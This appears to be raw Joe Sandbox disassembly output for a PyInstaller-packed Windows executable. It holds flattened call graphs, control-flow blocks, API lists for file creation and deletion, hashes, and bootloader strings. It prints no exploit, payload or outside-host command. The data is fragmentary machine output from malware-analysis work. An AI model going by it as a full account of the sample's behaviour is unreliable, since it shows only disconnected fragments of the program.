18259->18262 18261 7ff6900125f0 53 API calls 18260->18261 18267 7ff6900110a3 __std_exception_copy 18261->18267 18263 7ff6900110bd 18262->18263 18264 7ff6900110dd 18263->18264 18265 7ff6900110c1 18263->18265 18268 7ff69001110d 18264->18268 18269 7ff6900110ed 18264->18269 18266 7ff690012760 53 API calls 18265->18266 18275 7ff6900110d8 __std_exception_copy 18266->18275 18267->18173 18271 7ff690011113 18268->18271 18278 7ff690011126 18268->18278 18270 7ff690012760 53 API calls 18269->18270 18270->18275 18273 7ff6900111f0 92 API calls 18271->18273 18272 7ff69001f36c 74 API calls 18274 7ff690011194 18272->18274 18273->18275 18274->18267 18275->18272 18277 7ff69001f6bc _fread_nolock 53 API calls 18277->18278 18278->18275 18278->18277 18279 7ff6900111cc 18278->18279 18280 7ff690012760 53 API calls 18279->18280 18280->18275 18296 7ff69002428a 18295->18296 18297 7ff69002425d 18295->18297 18299 7ff6900242ad 18296->18299 18300 7ff6900242c9 18296->18300 18298 7ff6900243f4 memcpy_s 11 API calls 18297->18298 18306 7ff690024214 18297->18306 18301 7ff690024267 18298->18301 18302 7ff6900243f4 memcpy_s 11 API calls 18299->18302 18303 7ff690024178 45 API calls 18300->18303 18304 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 18301->18304 18305 7ff6900242b2 18302->18305 18309 7ff6900242bd 18303->18309 18308 7ff690024272 18304->18308 18307 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 18305->18307 18306->18208 18307->18309 18308->18208 18309->18208 18311 7ff690013ae6 18310->18311 18312 7ff690023ca4 49 API calls 18311->18312 18313 7ff690013b0c 18312->18313 18314 7ff690013b1d 18313->18314 18315 7ff690013f10 10 API calls 18313->18315 18314->18219 18316 7ff690013b2f 18315->18316 18316->18219 18318 7ff690017415 18317->18318 18319 7ff690013f70 108 API calls 18318->18319 18320 7ff69001743b 18319->18320 18374 7ff6900251d8 18373->18374 18375 7ff6900251fe 18374->18375 18378 7ff690025231 18374->18378 18376 7ff6900243f4 memcpy_s 11 API calls 18375->18376 18377 7ff690025203 18376->18377 18379 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 18377->18379 18380 7ff690025237 18378->18380 18381 7ff690025244 18378->18381 18382 7ff690013fc6 18379->18382 18383 7ff6900243f4 memcpy_s 11 API calls 18380->18383 18392 7ff690029f38 18381->18392 18382->17178 18383->18382 18405 7ff69002f5e8 EnterCriticalSection 18392->18405 18765 7ff690026c08 18764->18765 18768 7ff6900266e4 18765->18768 18767 7ff690026c21 18767->17188 18769 7ff6900266ff 18768->18769 18770 7ff69002672e 18768->18770 18771 7ff690029b24 _invalid_parameter_noinfo 37 API calls 18769->18771 18778 7ff69002477c EnterCriticalSection 18770->18778 18773 7ff69002671f 18771->18773 18773->18767 18780 7ff69001f191 18779->18780 18781 7ff69001f163 18779->18781 18783 7ff69001f183 18780->18783 18789 7ff69002477c EnterCriticalSection 18780->18789 18782 7ff690029b24 _invalid_parameter_noinfo 37 API calls 18781->18782 18782->18783 18783->17192 18791 7ff6900186b0 2 API calls 18790->18791 18792 7ff6900181b4 LoadLibraryExW 18791->18792 18793 7ff6900181d3 __std_exception_copy 18792->18793 18793->17222 18795 7ff690016ef3 GetProcAddress 18794->18795 18802 7ff690016ec9 18794->18802 18796 7ff690016f18 GetProcAddress 18795->18796 18795->18802 18798 7ff690016f3d GetProcAddress 18796->18798 18796->18802 18797 7ff6900129e0 51 API calls 18799 7ff690016ee3 18797->18799 18800 7ff690016f65 GetProcAddress 18798->18800 18798->18802 18799->17229 18801 7ff690016f8d GetProcAddress 18800->18801 18800->18802 18801->18802 18803 7ff690016fb5 GetProcAddress 18801->18803 18802->18797 18857->17249 18858->17251 18860 7ff690015b05 18859->18860 18861 7ff690011bf0 49 API calls 18860->18861 18862 7ff690015b41 18861->18862 18863 7ff690015b4a 18862->18863 18864 7ff690015b6d 18862->18864 18865 7ff6900125f0 53 API calls 18863->18865 18866 7ff690013fe0 49 API calls 18864->18866 18882 7ff690015b63 18865->18882 18867 7ff690015b85 18866->18867 18868 7ff690015ba3 18867->18868 18870 7ff6900125f0 53 API calls 18867->18870 18871 7ff690013f10 10 API calls 18868->18871 18869 7ff69001b870 _log10_special 8 API calls 18873 7ff69001308e 18869->18873 18870->18868 18872 7ff690015bad 18871->18872 18874 7ff690015bbb 18872->18874 18875 7ff6900181a0 3 API calls 18872->18875 18873->17262 18890 7ff690015c80 18873->18890 18876 7ff690013fe0 49 API calls 18874->18876 18875->18874 18877 7ff690015bd4 18876->18877 18878 7ff690015bf9 18877->18878 18879 7ff690015bd9 18877->18879 18881 7ff6900181a0 3 API calls 18878->18881 18880 7ff6900125f0 53 API calls 18879->18880 18880->18882 18883 7ff690015c06 18881->18883 18882->18869 18884 7ff690015c49 18883->18884 18885 7ff690015c12 18883->18885 18944 7ff6900150b0 GetProcAddress 18884->18944 18887 7ff6900186b0 2 API calls 18885->18887 18888 7ff690015c2a 18887->18888 18889 7ff6900129e0 51 API calls 18888->18889 18889->18882 19029 7ff690014c80 18890->19029 18892 7ff690015cba 18893 7ff690015cc2 18892->18893 18894 7ff690015cd3 18892->18894 18895 7ff6900125f0 53 API calls 18893->18895 19036 7ff690014450 18894->19036 18903 7ff690015cce 18895->18903 18898 7ff690015cdf 18899 7ff6900125f0 53 API calls 18898->18899 18899->18903 18900 7ff690015cf0 18901 7ff690015cff 18900->18901 18902 7ff690015d10 18900->18902 18903->17258 18930 7ff690015820 18929->18930 18930->18930 18945 7ff6900150f7 GetProcAddress 18944->18945 18946 7ff6900150d2 18944->18946 18945->18946 18947 7ff69001511c GetProcAddress 18945->18947 18948 7ff6900129e0 51 API calls 18946->18948 18947->18946 18949 7ff690015141 GetProcAddress 18947->18949 18951 7ff6900150ec 18948->18951 18949->18946 18951->18882 19031 7ff690014cac 19029->19031 19030 7ff690014cb4 19030->18892 19031->19030 19034 7ff690014e54 19031->19034 19067 7ff690025db4 19031->19067 19032 7ff690015017 __std_exception_copy 19032->18892 19033 7ff690014180 47 API calls 19033->19034 19034->19032 19034->19033 19037 7ff690014480 19036->19037 19038 7ff69001b870 _log10_special 8 API calls 19037->19038 19039 7ff6900144ea 19038->19039 19039->18898 19039->18900 19068 7ff690025de4 19067->19068 19071 7ff6900252b0 19068->19071 19070 7ff690025e14 19070->19031 19072 7ff6900252e1 19071->19072 19073 7ff6900252f3 19071->19073 19075 7ff6900243f4 memcpy_s 11 API calls 19072->19075 19074 7ff69002533d 19073->19074 19076 7ff690025300 19073->19076 19077 7ff690025358 19074->19077 19080 7ff690023ae0 45 API calls 19074->19080 19078 7ff6900252e6 19075->19078 19079 7ff690029b24 _invalid_parameter_noinfo 37 API calls 19076->19079 19083 7ff69002537a 19077->19083 19092 7ff690025d3c 19077->19092 19082 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 19078->19082 19090 7ff6900252f1 19079->19090 19080->19077 19082->19090 19084 7ff69002541b 19083->19084 19086 7ff6900243f4 memcpy_s 11 API calls 19083->19086 19085 7ff6900243f4 memcpy_s 11 API calls 19084->19085 19084->19090 19088 7ff690025410 19086->19088 19090->19070 19093 7ff690025d5f 19092->19093 19095 7ff690025d76 19092->19095 19098 7ff69002f278 19093->19098 19097 7ff690025d64 19095->19097 19103 7ff69002f2a8 19095->19103 19097->19077 19132->17265 19381 7ff690029060 19384 7ff690028fe4 19381->19384 19391 7ff69002f5e8 EnterCriticalSection 19384->19391 19950 7ff69002a2e0 19951 7ff69002a2e5 19950->19951 19955 7ff69002a2fa 19950->19955 19956 7ff69002a300 19951->19956 19957 7ff69002a34a 19956->19957 19958 7ff69002a342 19956->19958 19960 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19957->19960 19959 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19958->19959 19959->19957 19961 7ff69002a357 19960->19961 19962 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19961->19962 19963 7ff69002a364 19962->19963 19964 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19963->19964 19965 7ff69002a371 19964->19965 19966 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19965->19966 19967 7ff69002a37e 19966->19967 19968 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19967->19968 19969 7ff69002a38b 19968->19969 19970 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19969->19970 19971 7ff69002a398 19970->19971 19972 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19971->19972 19973 7ff69002a3a5 19972->19973 19974 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19973->19974 19975 7ff69002a3b5 19974->19975 19976 7ff690029c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19975->19976 19977 7ff69002a3c5 19976->19977 19982 7ff69002a1a4 19977->19982 19996 7ff69002f5e8 EnterCriticalSection 19982->19996 20041 7ff69003a10e 20042 7ff69003a11d 20041->20042 20044 7ff69003a127 20041->20044 20045 7ff69002f648 LeaveCriticalSection 20042->20045 19404 7ff69003a079 19407 7ff690024788 LeaveCriticalSection 19404->19407 16567 7ff690028c79 16579 7ff6900296e8 16567->16579 16580 7ff69002a460 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16579->16580 16581 7ff6900296f1 16580->16581 16582 7ff690029814 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16581->16582 16583 7ff690029711 16582->16583 19133 7ff69001ae00 19134 7ff69001ae2e 19133->19134 19135 7ff69001ae15 19133->19135 19135->19134 19137 7ff69002c90c 12 API calls 19135->19137 19136 7ff69001ae8e 19137->19136 20121 7ff69002b830 20132 7ff69002f5e8 EnterCriticalSection 20121->20132 19744 7ff69002ec9c 19745 7ff69002ee8e 19744->19745 19747 7ff69002ecde _isindst 19744->19747 19746 7ff6900243f4 memcpy_s 11 API calls 19745->19746 19764 7ff69002ee7e 19746->19764 19747->19745 19750 7ff69002ed5e _isindst 19747->19750 19748 7ff69001b870 _log10_special 8 API calls 19749 7ff69002eea9 19748->19749 19765 7ff6900354a4 19750->19765 19755 7ff69002eeba 19757 7ff690029c10 _isindst 17 API calls 19755->19757 19759 7ff69002eece 19757->19759 19762 7ff69002edbb 19762->19764 19790 7ff6900354e8 19762->19790 19764->19748 19766 7ff69002ed7c 19765->19766 19767 7ff6900354b3 19765->19767 19772 7ff6900348a8 19766->19772 19797 7ff69002f5e8 EnterCriticalSection 19767->19797 19773 7ff69002ed91 19772->19773 19774 7ff6900348b1 19772->19774 19773->19755 19778 7ff6900348d8 19773->19778 19775 7ff6900243f4 memcpy_s 11 API calls 19774->19775 19776 7ff6900348b6 19775->19776 19777 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 19776->19777 19777->19773 19779 7ff69002eda2 19778->19779 19780 7ff6900348e1 19778->19780 19779->19755 19784 7ff690034908 19779->19784 19781 7ff6900243f4 memcpy_s 11 API calls 19780->19781 19782 7ff6900348e6 19781->19782 19783 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 19782->19783 19783->19779 19785 7ff690034911 19784->19785 19789 7ff69002edb3 19784->19789 19786 7ff6900243f4 memcpy_s 11 API calls 19785->19786 19787 7ff690034916 19786->19787 19788 7ff690029bf0 _invalid_parameter_noinfo 37 API calls 19787->19788 19788->19789 19789->19755 19789->19762 19798 7ff69002f5e8 EnterCriticalSection 19790->19798 20169 7ff690024720 20170 7ff69002472b 20169->20170 20178 7ff69002e5b4 20170->20178 20191 7ff69002f5e8 EnterCriticalSection 20178->20191

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 0 7ff690011000-7ff690013536 call 7ff69001f138 call 7ff69001f140 call 7ff69001bb70 call 7ff690024700 call 7ff690024794 call 7ff6900133e0 14 7ff690013538-7ff69001353f 0->14 15 7ff690013544-7ff690013566 call 7ff6900118f0 0->15 16 7ff69001371a-7ff690013735 call 7ff69001b870 14->16 20 7ff690013736-7ff69001374c call 7ff690013f70 15->20 21 7ff69001356c-7ff690013583 call 7ff690011bf0 15->21 27 7ff69001374e-7ff69001377b call 7ff6900176a0 20->27 28 7ff690013785-7ff69001379a call 7ff6900125f0 20->28 26 7ff690013588-7ff6900135c1 21->26 29 7ff6900135c7-7ff6900135cb 26->29 30 7ff690013653-7ff69001366d call 7ff690017e10 26->30 41 7ff69001377d-7ff690013780 call 7ff69001f36c 27->41 42 7ff69001379f-7ff6900137be call 7ff690011bf0 27->42 44 7ff690013712 28->44 33 7ff690013638-7ff69001364d call 7ff6900118e0 29->33 34 7ff6900135cd-7ff6900135e5 call 7ff690024560 29->34 46 7ff69001366f-7ff690013675 30->46 47 7ff690013695-7ff69001369c 30->47 33->29 33->30 50 7ff6900135e7-7ff6900135eb 34->50 51 7ff6900135f2-7ff69001360a call 7ff690024560 34->51 41->28 63 7ff6900137c1-7ff6900137ca 42->63 44->16 52 7ff690013677-7ff690013680 46->52 53 7ff690013682-7ff690013690 call 7ff69002415c 46->53 54 7ff6900136a2-7ff6900136c0 call 7ff690017e10 call 7ff690017f80 47->54 55 7ff690013844-7ff690013863 call 7ff690013e90 47->55 50->51 69 7ff690013617-7ff69001362f call 7ff690024560 51->69 70 7ff69001360c-7ff690013610 51->70 52->53 53->47 78 7ff6900136c6-7ff6900136c9 54->78 79 7ff69001380f-7ff69001381e call 7ff690018400 54->79 66 7ff690013871-7ff690013882 call 7ff690011bf0 55->66 67 7ff690013865-7ff69001386f call 7ff690013fe0 55->67 63->63 68 7ff6900137cc-7ff6900137e9 call 7ff6900118f0 63->68 81 7ff690013887-7ff6900138a1 call 7ff6900186b0 66->81 67->81 68->26 82 7ff6900137ef-7ff690013800 call 7ff6900125f0 68->82 69->33 83 7ff690013631 69->83 70->69 78->79 84 7ff6900136cf-7ff6900136f6 call 7ff690011bf0 78->84 93 7ff69001382c-7ff69001382f call 7ff690017c40 79->93 94 7ff690013820 79->94 95 7ff6900138af-7ff6900138c1 SetDllDirectoryW 81->95 96 7ff6900138a3 81->96 82->44 83->33 97 7ff6900136fc-7ff690013703 call 7ff6900125f0 84->97 98 7ff690013805-7ff69001380d call 7ff69002415c 84->98 106 7ff690013834-7ff690013836 93->106 94->93 100 7ff6900138d0-7ff6900138ec call 7ff690016560 call 7ff690016b00 95->100 101 7ff6900138c3-7ff6900138ca 95->101 96->95 109 7ff690013708-7ff69001370a 97->109 98->81 118 7ff690013947-7ff69001394a call 7ff690016510 100->118 119 7ff6900138ee-7ff6900138f4 100->119 101->100 102 7ff690013a50-7ff690013a58 101->102 110 7ff690013a5a-7ff690013a77 PostMessageW GetMessageW 102->110 111 7ff690013a7d-7ff690013aaf call 7ff6900133d0 call 7ff690013080 call 7ff6900133a0 call 7ff690016780 call 7ff690016510 102->111 106->81 112 7ff690013838 106->112 109->44 110->111 112->55 126 7ff69001394f-7ff690013956 118->126 121 7ff6900138f6-7ff690013903 call 7ff6900165a0 119->121 122 7ff69001390e-7ff690013918 call 7ff690016970 119->122 121->122 133 7ff690013905-7ff69001390c 121->133 135 7ff69001391a-7ff690013921 122->135 136 7ff690013923-7ff690013931 call 7ff690016cd0 122->136 126->102 130 7ff69001395c-7ff690013966 call 7ff6900130e0 126->130 130->109 144 7ff69001396c-7ff690013980 call 7ff6900183e0 130->144 138 7ff69001393a-7ff690013942 call 7ff690012870 call 7ff690016780 133->138 135->138 136->126 145 7ff690013933 136->145 138->118 151 7ff690013982-7ff69001399f PostMessageW GetMessageW 144->151 152 7ff6900139a5-7ff6900139e1 call 7ff690017f20 call 7ff690017fc0 call 7ff690016780 call 7ff690016510 call 7ff690017ec0 144->152 145->138 151->152 162 7ff6900139e6-7ff6900139e8 152->162 163 7ff6900139ea-7ff690013a00 call 7ff6900181f0 call 7ff690017ec0 162->163 164 7ff690013a3d-7ff690013a4b call 7ff6900118a0 162->164 163->164 171 7ff690013a02-7ff690013a10 163->171 164->109 172 7ff690013a31-7ff690013a38 call 7ff690012870 171->172 173 7ff690013a12-7ff690013a2c call 7ff6900125f0 call 7ff6900118a0 171->173 172->164 173->109
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                                  • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
                                                                                                                                                                  • API String ID: 514040917-585287483
                                                                                                                                                                  • Opcode ID: 584115fd1db2c40171e3cbeeecd4cdcfff0b65b79360e5f9804180160524b8df
                                                                                                                                                                  • Instruction ID: 474b030fdf745ab564fdf7fb3f6c5f80cb3659e2ab9b4b01cf09ef63c0e4f6ba
                                                                                                                                                                  • Opcode Fuzzy Hash: 584115fd1db2c40171e3cbeeecd4cdcfff0b65b79360e5f9804180160524b8df
                                                                                                                                                                  • Instruction Fuzzy Hash: 75F17C21A0CA82B1EBB9DB31D5542F96661EF44788F8440B2EA5DC33DEEF2CE559D300

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 335 7ff690035c74-7ff690035ce7 call 7ff6900359a8 338 7ff690035ce9-7ff690035cf2 call 7ff6900243d4 335->338 339 7ff690035d01-7ff690035d0b call 7ff690027830 335->339 346 7ff690035cf5-7ff690035cfc call 7ff6900243f4 338->346 344 7ff690035d26-7ff690035d8f CreateFileW 339->344 345 7ff690035d0d-7ff690035d24 call 7ff6900243d4 call 7ff6900243f4 339->345 348 7ff690035e0c-7ff690035e17 GetFileType 344->348 349 7ff690035d91-7ff690035d97 344->349 345->346 357 7ff690036042-7ff690036062 346->357 352 7ff690035e19-7ff690035e54 GetLastError call 7ff690024368 CloseHandle 348->352 353 7ff690035e6a-7ff690035e71 348->353 355 7ff690035dd9-7ff690035e07 GetLastError call 7ff690024368 349->355 356 7ff690035d99-7ff690035d9d 349->356 352->346 369 7ff690035e5a-7ff690035e65 call 7ff6900243f4 352->369 360 7ff690035e79-7ff690035e7c 353->360 361 7ff690035e73-7ff690035e77 353->361 355->346 356->355 362 7ff690035d9f-7ff690035dd7 CreateFileW 356->362 366 7ff690035e82-7ff690035ed7 call 7ff690027748 360->366 367 7ff690035e7e 360->367 361->366 362->348 362->355 374 7ff690035ed9-7ff690035ee5 call 7ff690035bb0 366->374 375 7ff690035ef6-7ff690035f27 call 7ff690035728 366->375 367->366 369->346 374->375 380 7ff690035ee7 374->380 381 7ff690035f29-7ff690035f2b 375->381 382 7ff690035f2d-7ff690035f6f 375->382 383 7ff690035ee9-7ff690035ef1 call 7ff690029dd0 380->383 381->383 384 7ff690035f91-7ff690035f9c 382->384 385 7ff690035f71-7ff690035f75 382->385 383->357 388 7ff690036040 384->388 389 7ff690035fa2-7ff690035fa6 384->389 385->384 387 7ff690035f77-7ff690035f8c 385->387 387->384 388->357 389->388 391 7ff690035fac-7ff690035ff1 CloseHandle CreateFileW 389->391 392 7ff690036026-7ff69003603b 391->392 393 7ff690035ff3-7ff690036021 GetLastError call 7ff690024368 call 7ff690027970 391->393 392->388 393->392
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1617910340-0
                                                                                                                                                                  • Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                  • Instruction ID: 508367570384a89883b3ecbd5e794a836ca73a2b604927ea56c7b07e99bd5283
                                                                                                                                                                  • Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                                                                                                  • Instruction Fuzzy Hash: 17C1BF36B28A4196EB25CF79C490AAD3761FB49BA8B011275DF2ED77A8CF38D151C300

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileW.KERNELBASE(?,00007FF690017EF9,00007FF6900139E6), ref: 00007FF690017A1B
                                                                                                                                                                  • RemoveDirectoryW.KERNEL32(?,00007FF690017EF9,00007FF6900139E6), ref: 00007FF690017A9E
                                                                                                                                                                  • DeleteFileW.KERNELBASE(?,00007FF690017EF9,00007FF6900139E6), ref: 00007FF690017ABD
                                                                                                                                                                  • FindNextFileW.KERNELBASE(?,00007FF690017EF9,00007FF6900139E6), ref: 00007FF690017ACB
                                                                                                                                                                  • FindClose.KERNEL32(?,00007FF690017EF9,00007FF6900139E6), ref: 00007FF690017ADC
                                                                                                                                                                  • RemoveDirectoryW.KERNELBASE(?,00007FF690017EF9,00007FF6900139E6), ref: 00007FF690017AE5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                  • String ID: %s\*
                                                                                                                                                                  • API String ID: 1057558799-766152087
                                                                                                                                                                  • Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                                                                                  • Instruction ID: 502c55dc6f1132b9c735b8fea1043c38e0679fed4e087c35def80b6b0518c691
                                                                                                                                                                  • Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                                                                                                  • Instruction Fuzzy Hash: A4416F21A0C942A5EAB09B34E4545BD6361FF98758F800672E69DC37DCDF7CD68AC701
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                                                  • Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                  • Instruction ID: 5fed89063433a5787eb8b26b0daf6557e4d07e8364db9dd4f400cd070d38da90
                                                                                                                                                                  • Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                                                                                                  • Instruction Fuzzy Hash: 87F0C222A19682D6F7B08B70B4997667390EB8472CF440335EA6D427D8DF7CE059CB04
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.2271789526.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 0000000B.00000002.2271755585.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271847334.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2271890124.00007FF690054000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 0000000B.00000002.2272047968.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_11_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1010374628-0
                                                                                                                                                                  • Opcode ID: 2b6c2d1e4c043c62936e9dac6caf21e199e31a345cf4845f2c7219b702089de4
                                                                                                                                                                  • Instruction ID: f448b072ed3fbe82ca8d86ed0d5e8159ca1899eaecb149c2c71fb03d0a6456b3
                                                                                                                                                                  • Opcode Fuzzy Hash: 2b6c2d1e4c043c62936e9dac6caf21e199e31a345cf4845f2c7219b702089de4
                                                                                                                                                                  • Instruction Fuzzy Hash: 0002C221A0E64760FE76EB3A94116BE2680EF05BD0F5546B9DD6DC63DEDE3CE4128300

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
